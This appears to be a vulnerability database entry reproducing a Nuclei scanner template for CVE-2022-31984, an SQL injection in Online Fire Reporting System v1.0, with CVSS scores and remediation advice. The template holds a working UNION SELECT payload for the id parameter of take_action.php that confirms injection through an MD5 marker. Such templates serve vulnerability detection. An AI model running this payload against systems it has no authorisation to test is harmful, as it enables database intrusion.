Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-31984
HistoryJun 05, 2023 - 7:03 a.m.

Online Fire Reporting System v1.0 - SQL injection

2023-06-0507:03:16
ProjectDiscovery
github.com
10
cve2022
sqli
online-fire-reporting
online_fire_reporting_system_project
unauthorized-access
data-leakage
database-manipulation
validation-and-sanitization
cvss-3-1
cwe-89

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

EPSS

0.011

Percentile

84.7%

Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.
id: CVE-2022-31984

info:
  name: Online Fire Reporting System v1.0 - SQL injection
  author: theamanrawat
  severity: high
  description: |
    Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database.
  remediation: |
    To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
  reference:
    - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md
    - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31984
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-31984
    cwe-id: CWE-89
    epss-score: 0.01593
    epss-percentile: 0.87356
    cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: online_fire_reporting_system_project
    product: online_fire_reporting_system
  tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project
variables:
  num: '999999999'

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 4a0a004730450220389add9cc6b1a640e2282894dbc596ff61dffa9a00cc8035e534238d115157c6022100de0abc2017d0e7c41ec520e3e0093879ae26f9d21fc1a65624111024ad5f0ca8:922c64590222798bb761d5b6d8e72950

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

CVSS3

7.2

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

EPSS

0.011

Percentile

84.7%

Related for NUCLEI:CVE-2022-31984